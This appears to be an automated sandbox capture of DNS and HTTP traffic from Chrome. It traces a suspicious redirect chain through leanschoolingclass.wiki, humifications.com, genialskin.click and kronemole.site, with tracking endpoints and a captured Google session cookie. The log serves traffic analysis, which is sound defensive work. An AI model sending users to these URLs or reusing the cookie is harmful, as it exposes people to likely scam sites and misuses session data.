                                                                          Nov 21, 2023 17:59:04.218830109 CET1.1.1.1192.168.2.40xa4caNo error (0)android.l.google.com172.253.63.100A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:04.218830109 CET1.1.1.1192.168.2.40xa4caNo error (0)android.l.google.com172.253.63.139A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:04.218830109 CET1.1.1.1192.168.2.40xa4caNo error (0)android.l.google.com172.253.115.101A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:04.218830109 CET1.1.1.1192.168.2.40xa4caNo error (0)android.l.google.com172.253.122.102A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:04.218830109 CET1.1.1.1192.168.2.40xa4caNo error (0)android.l.google.com172.253.115.113A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:04.846318960 CET1.1.1.1192.168.2.40x67e2No error (0)mobile-gtalk.l.google.com172.253.62.188A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:05.738528013 CET1.1.1.1192.168.2.40xf7a0No error (0)subscription.trk-essursta.com65IN (0x0001)false
                                                                          Nov 21, 2023 17:59:05.739789009 CET1.1.1.1192.168.2.40x54c9No error (0)subscription.trk-essursta.com172.67.173.33A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:05.739789009 CET1.1.1.1192.168.2.40x54c9No error (0)subscription.trk-essursta.com104.21.72.3A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:07.080539942 CET1.1.1.1192.168.2.40x513fNo error (0)api.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:07.080539942 CET1.1.1.1192.168.2.40x513fNo error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:07.080539942 CET1.1.1.1192.168.2.40x513fNo error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:07.080539942 CET1.1.1.1192.168.2.40x513fNo error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:07.080539942 CET1.1.1.1192.168.2.40x513fNo error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:07.090296030 CET1.1.1.1192.168.2.40x20c2No error (0)api.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:07.886564016 CET1.1.1.1192.168.2.40x92deNo error (0)api.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:07.886564016 CET1.1.1.1192.168.2.40x92deNo error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:07.886564016 CET1.1.1.1192.168.2.40x92deNo error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:07.886564016 CET1.1.1.1192.168.2.40x92deNo error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:07.886564016 CET1.1.1.1192.168.2.40x92deNo error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:07.886936903 CET1.1.1.1192.168.2.40xbaeaNo error (0)api.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                          • accounts.google.com
                                                                          • clients2.google.com
                                                                          • humifications.com
                                                                          • fs.microsoft.com
                                                                          • https:
                                                                            • genialskin.click
                                                                            • kronemole.site
                                                                            • trk-essursta.com
                                                                            • trk-amropode.com
                                                                            • event.trk-essursta.com
                                                                            • subscription.trk-essursta.com
                                                                            • api.taboola.com
                                                                          • slscr.update.microsoft.com
                                                                          • android.clients.google.com
                                                                          • leanschoolingclass.wiki
                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.44973945.156.26.175805352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Nov 21, 2023 17:58:34.279964924 CET106OUTGET /cl/11677_md/2000/2794/2021/49922/7518 HTTP/1.1
                                                                          Host: leanschoolingclass.wiki
                                                                          Connection: keep-alive
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Nov 21, 2023 17:58:35.866746902 CET112INHTTP/1.1 302 Found
                                                                          Date: Tue, 21 Nov 2023 16:58:34 GMT
                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.1.33
                                                                          X-Powered-By: PHP/7.1.33
                                                                          Location: https://humifications.com/0/2/41423/3af5e0a6c068554b3d8550e8c2d39e93/2000/11677_1/49922_7518_2794_32559_md
                                                                          Content-Length: 163
                                                                          Keep-Alive: timeout=5, max=100
                                                                          Connection: Keep-Alive
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Data Raw: 3c 73 63 72 69 70 74 3e 69 66 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 69 6e 63 6c 75 64 65 73 28 22 23 22 29 29 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 72 65 70 6c 61 63 65 28 2f 5c 2f 5c 23 5c 2f 2f 67 2c 27 23 27 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2f 5c 23 2f 67 2c 27 23 27 29 2e 72 65 70 6c 61 63 65 28 2f 5c 23 2f 67 2c 27 2f 27 29 3b 3c 2f 73 63 72 69 70 74 3e
                                                                          Data Ascii: <script>if(window.location.href.includes("#")) window.location.href = window.location.href.replace(/\/\#\//g,'#').replace(/\/\#/g,'#').replace(/\#/g,'/');</script>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.44973845.156.26.175805352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Nov 21, 2023 17:59:19.288702965 CET2012OUTData Raw: 00
                                                                          Data Ascii:


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.44974145.156.26.175805352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Nov 21, 2023 17:59:19.426944017 CET2012OUTData Raw: 00
                                                                          Data Ascii:


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.449729142.251.16.844435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:31 UTC0OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                                                          Host: accounts.google.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 1
                                                                          Origin: https://www.google.com
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: empty
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: NID=511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk
                                                                          2023-11-21 16:58:31 UTC0OUTData Raw: 20
                                                                          Data Ascii:
                                                                          2023-11-21 16:58:32 UTC2INHTTP/1.1 200 OK
                                                                          Content-Type: application/json; charset=utf-8
                                                                          Access-Control-Allow-Origin: https://www.google.com
                                                                          Access-Control-Allow-Credentials: true
                                                                          X-Content-Type-Options: nosniff
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Tue, 21 Nov 2023 16:58:32 GMT
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-n1c29vnMtahem9vrdoYaVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Server: ESF
                                                                          X-XSS-Protection: 0
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Accept-Ranges: none
                                                                          Vary: Accept-Encoding
                                                                          Connection: close
                                                                          Transfer-Encoding: chunked
                                                                          2023-11-21 16:58:32 UTC4INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                                                                          Data Ascii: 11["gaia.l.a.r",[]]
                                                                          2023-11-21 16:58:32 UTC4INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.449731142.251.16.1394435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:31 UTC0OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                                                          Host: clients2.google.com
                                                                          Connection: keep-alive
                                                                          X-Goog-Update-Interactivity: fg
                                                                          X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                                                                          X-Goog-Update-Updater: chromecrx-117.0.5938.132
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: empty
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-11-21 16:58:32 UTC1INHTTP/1.1 200 OK
                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-nAcbDS1sgzIFTd0lkuoZyA' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Tue, 21 Nov 2023 16:58:32 GMT
                                                                          Content-Type: text/xml; charset=UTF-8
                                                                          X-Daynum: 6168
                                                                          X-Daystart: 32312
                                                                          X-Content-Type-Options: nosniff
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-XSS-Protection: 1; mode=block
                                                                          Server: GSE
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Accept-Ranges: none
                                                                          Vary: Accept-Encoding
                                                                          Connection: close
                                                                          Transfer-Encoding: chunked
                                                                          2023-11-21 16:58:32 UTC2INData Raw: 32 63 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 36 31 36 38 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 33 32 33 31 32 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                                                                          Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="6168" elapsed_seconds="32312"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                                                                          2023-11-21 16:58:32 UTC2INData Raw: 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f 67 75 70 64 61 74 65 3e 0d 0a
                                                                          Data Ascii: 723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></gupdate>
                                                                          2023-11-21 16:58:32 UTC2INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.44974223.199.50.2443
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:36 UTC4OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept: */*
                                                                          Accept-Encoding: identity
                                                                          User-Agent: Microsoft BITS/7.8
                                                                          Host: fs.microsoft.com
                                                                          2023-11-21 16:58:36 UTC4INHTTP/1.1 200 OK
                                                                          ApiVersion: Distribute 1.1
                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                          Content-Type: application/octet-stream
                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                          Server: ECAcc (chd/073D)
                                                                          X-CID: 11
                                                                          Cache-Control: public, max-age=84813
                                                                          Date: Tue, 21 Nov 2023 16:58:36 GMT
                                                                          Connection: close
                                                                          X-CID: 2


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.44974364.137.16.194435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:36 UTC5OUTGET /0/2/41423/3af5e0a6c068554b3d8550e8c2d39e93/2000/11677_1/49922_7518_2794_32559_md HTTP/1.1
                                                                          Host: humifications.com
                                                                          Connection: keep-alive
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-Dest: document
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-11-21 16:58:37 UTC6INHTTP/1.1 200 OK
                                                                          date: Tue, 21 Nov 2023 16:58:37 GMT
                                                                          content-type: text/html; charset=UTF-8
                                                                          content-length: 141
                                                                          server: Apache
                                                                          set-cookie: uid1782=1091114752-20231121115837-c1f943af470c014f007e25b7458cb88b-3038; domain=; expires=Thu, 21-Dec-2023 16:58:37 GMT; path=/; SameSite=None; Secure
                                                                          connection: close
                                                                          2023-11-21 16:58:37 UTC6INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 65 6e 69 61 6c 73 6b 69 6e 2e 63 6c 69 63 6b 2f 3f 73 31 3d 33 35 31 31 39 31 26 73 32 3d 31 30 39 31 31 31 34 37 35 32 26 73 33 3d 31 37 38 32 26 73 34 3d 33 30 33 38 26 6f 77 3d 26 73 31 30 3d 33 30 37 39 22 3c 2f 73 63 72 69 70 74 3e
                                                                          Data Ascii: <script type="text/javascript">window.location.href="https://genialskin.click/?s1=351191&s2=1091114752&s3=1782&s4=3038&ow=&s10=3079"</script>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.44974423.199.50.2443
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:36 UTC5OUTGET /fs/windows/config.json HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept: */*
                                                                          Accept-Encoding: identity
                                                                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                          Range: bytes=0-2147483646
                                                                          User-Agent: Microsoft BITS/7.8
                                                                          Host: fs.microsoft.com
                                                                          2023-11-21 16:58:37 UTC5INHTTP/1.1 200 OK
                                                                          Content-Type: application/octet-stream
                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                          ApiVersion: Distribute 1.1
                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                          X-CID: 7
                                                                          X-CCC: US
                                                                          X-Azure-Ref-OriginShield: Ref A: 974286BFDC254CDCB50C2B73CC4B4276 Ref B: MNZ221060605025 Ref C: 2023-03-13T15:26:50Z
                                                                          X-MSEdge-Ref: Ref A: 87B54C6474A14C81B6E546C3B6B2F842 Ref B: BLUEDGE1720 Ref C: 2023-03-13T15:26:50Z
                                                                          Cache-Control: public, max-age=84871
                                                                          Date: Tue, 21 Nov 2023 16:58:37 GMT
                                                                          Content-Length: 55
                                                                          Connection: close
                                                                          X-CID: 2
                                                                          2023-11-21 16:58:37 UTC6INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.449745104.21.14.2334435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:37 UTC7OUTGET /?s1=351191&s2=1091114752&s3=1782&s4=3038&ow=&s10=3079 HTTP/1.1
                                                                          Host: genialskin.click
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-Dest: document
                                                                          Referer: https://humifications.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-11-21 16:58:38 UTC7INHTTP/1.1 302 Found
                                                                          Date: Tue, 21 Nov 2023 16:58:38 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          location: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09
                                                                          set-cookie: PHPSESSID=f5042882383413f9e4cf506f6021db2b; path=/; secure
                                                                          expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                          pragma: no-cache
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          vary: User-Agent,User-Agent
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K5lHyISJnHQx2zf98TcPq563aWAa0HkwkNhY8Gx5771TxHs2xd4Ajf0SPLsPV9gW0dkJAq5yyXIEJS%2BehlI6kn8AYuXbbeKheeOB6wwiz2sjEViCWFKkFEH044kppzZRJGet"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7a8438f3592e-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:38 UTC8INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.2.449747104.21.62.2034435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:39 UTC8OUTGET /00751fdff8a0f3cf22b7cf59c24e5f09 HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-Dest: document
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Referer: https://humifications.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-11-21 16:58:39 UTC9INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:39 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          set-cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a; path=/; secure
                                                                          expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          pragma: no-cache
                                                                          vary: Accept-Encoding,User-Agent,User-Agent
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=p%2F4WRqVZRSM8u78TK1tgqfl%2B%2F3n9FXaNwc8GKdHuqzRHqFVTzF3rMnBgnLbU9UdcSIKTVwGq96jzXamnfJZ5ZC6b6XgGb872%2Fh5u3ZFRomblB652fFL5QhRFKTD4wVbbHA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7a8abe133b14-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:39 UTC10INData Raw: 37 63 32 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c
                                                                          Data Ascii: 7c2a<html lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="robots" content="noindex, nofollow, noarchive"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1"> <
                                                                          2023-11-21 16:58:39 UTC10INData Raw: 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 72 6f 6e 65 6d 6f 6c 65 2e 73 69 74 65 2f 61 73 73 65 74 73 2f 6a 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 61 73 3d 22 73 74 79 6c 65 22 20 6f 6e 6c 6f 61 64 3d 22 74 68 69 73 2e 6f 6e 6c 6f 61 64 3d 6e 75 6c 6c 3b 74 68 69 73 2e 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 22 3e 0a 20 20 3c 6e 6f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 72 6f 6e 65 6d 6f 6c 65 2e 73 69 74 65 2f 61 73 73 65 74 73 2f 6a 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e
                                                                          Data Ascii: ="preload" href="https://kronemole.site/assets/js/vendor/bootstrap/css/bootstrap.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'"> <noscript><link rel="stylesheet" href="https://kronemole.site/assets/js/vendor/bootstrap/css/bootstrap.
